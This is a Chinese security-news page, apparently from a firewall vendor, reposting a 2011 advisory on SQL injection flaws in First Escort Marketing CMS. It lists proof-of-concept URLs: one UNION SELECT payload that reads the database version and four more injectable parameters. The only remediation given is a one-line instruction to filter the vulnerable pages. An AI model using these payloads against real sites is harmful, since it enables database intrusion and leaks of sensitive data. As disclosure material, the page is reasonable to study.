English
 电子信箱
 加入收藏

  威盾防火墙 >> 新闻中心 >> 业界动态 >> First Escort Marketing多个SQL注入漏洞及修复
 

First Escort Marketing多个SQL注入漏洞及修复

威盾防火墙 2014-12-23
 

 First Escort Marketing是一款商业的内容管理系统,First Escort Marketing中的多个文件存在SQL注入漏洞,可能导致敏感信息泄露。

[+]info:
~~~~~~~~~
First Escort Marketing CMS Multiple SQL Injection
# Platform: php
# Date: 18.04.2011
# Author: NoNameMT
# Software Link: html">http://www.first-escort-marketing.co.uk/agencies.html
# Price: 599 £
# Tested on: Windows 7
# Mail: [email protected]
# Homepage: http://nonamemt.us

[+]poc:
~~~~~~~~~
http://www.2cto.com/escort_agency/banner.php?categoryID=-2+union+select+1,version(),3,4,5,6,7--+
http://www.2cto.com/escort_agency/escort-profile.php?modelid=13[Blind-SQL]
http://www.2cto.com/escort_agency/write_review.php?modelid=13[SQL]
http://www.2cto.com/escort_agency/booking-form.php?modelid=13[SQL]
http://www.2cto.com/escort_agency/gallery_escorts.php?gallery_id=13[SQL]

修复:过滤漏洞页面

 
相关内容: 最新内容:
php远程文件包含漏洞原理[2014-12-23]
SA注入拿SQL的HASH[2014-12-23]
在过滤单引号的条件下进行mssql盲注[2014-12-23]
用防盗链系统修复IIS6.0解析漏洞的技巧[2014-12-23]
[攻防手记]SQL Server注入大全及防御[2014-12-20]
阻击黑客利用第三方软件漏洞发起的攻击[2014-12-20]
 php远程文件包含漏洞原理[2014-12-23]
ASP后门之终极伪装+在线琳法ASP加密解密[2014-12-23]
SA注入拿SQL的HASH[2014-12-23]
在过滤单引号的条件下进行mssql盲注[2014-12-23]
突破防盗链访问WEBSHELL[2014-12-23]
用防盗链系统修复IIS6.0解析漏洞的技巧[2014-12-23]